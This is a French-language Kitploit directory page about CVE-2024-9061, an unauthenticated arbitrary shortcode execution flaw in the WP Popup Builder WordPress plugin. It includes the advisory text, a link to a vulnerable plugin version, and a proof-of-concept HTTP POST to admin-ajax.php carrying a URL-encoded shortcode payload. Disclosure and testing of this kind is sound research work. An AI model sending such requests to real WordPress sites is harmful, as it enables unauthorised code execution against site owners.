Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-9061 — WP Popup Builder – Formulaires de popup et génération de prospects marketing <= 1.3.5 - Exécution arbitraire de shortcode non authentifiée via wp_ajax_nopriv_shortcode_Api_Add | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2024-9061
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubrandomrobbiebf/cve-2024-9061

CVE-2024-9061

WP Popup Builder – Formulaires de popup et génération de prospects marketing <= 1.3.5 - Exécution arbitraire de shortcode non authentifiée via wp_ajax_nopriv_shortcode_Api_Add

Voir le dépôt
3il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-9061

WP Popup Builder – Popup Forms and Marketing Lead Generation <= 1.3.5 - Exécution de shortcode arbitraire non authentifiée via wp_ajax_nopriv_shortcode_Api_Add

Description

Le Le plugin WP Popup Builder – Popup Forms and Marketing Lead Generation pour WordPress est vulnérable à l'exécution de shortcode arbitraire via l'action AJAX wp_ajax_nopriv_shortcode_Api_Add dans toutes les versions jusqu'à la 1.3.5 incluse. Cela est dû au fait que le logiciel permet aux utilisateurs d'exécuter une action qui ne valide pas correctement une valeur avant d'exécuter do_shortcode. Cela permet à des attaquants non authentifiés d'exécuter des shortcodes arbitraires. NOTE : Cette vulnérabilité a été partiellement corrigée dans la version 1.3.5 avec une vérification nonce, ce qui a effectivement empêché l'accès à la fonction affectée. Cependant, la version 1.3.6 intègre la vérification d'autorisation correcte pour empêcher tout accès non autorisé.

J'avais un autre plugin installé pour l'exécution de php pour cela mais je n'ai jamais réussi à l'exécuter.

[xyz-ips snippet="test"]

Informations

root@kitploit:~
Type: plugin
CVSS Score: 7.3
CVE: CVE-2024-9061
Slug: wp-popup-builder
Download Link: Download [wp-popup-builder Version 1.3.2](https://downloads.wordpress.org/plugin/wp-popup-builder.1.3.2.zip)

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: curl/8.7.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Connection: keep-alive

action=shortcode_Api_Add&shortcode=%5b%78%79%7a%2d%69%70%73%20%73%6e%69%70%70%65%74%3d%22%74%65%73%74%22%5d

La réponse est un 200 vierge

Télécharger l’outil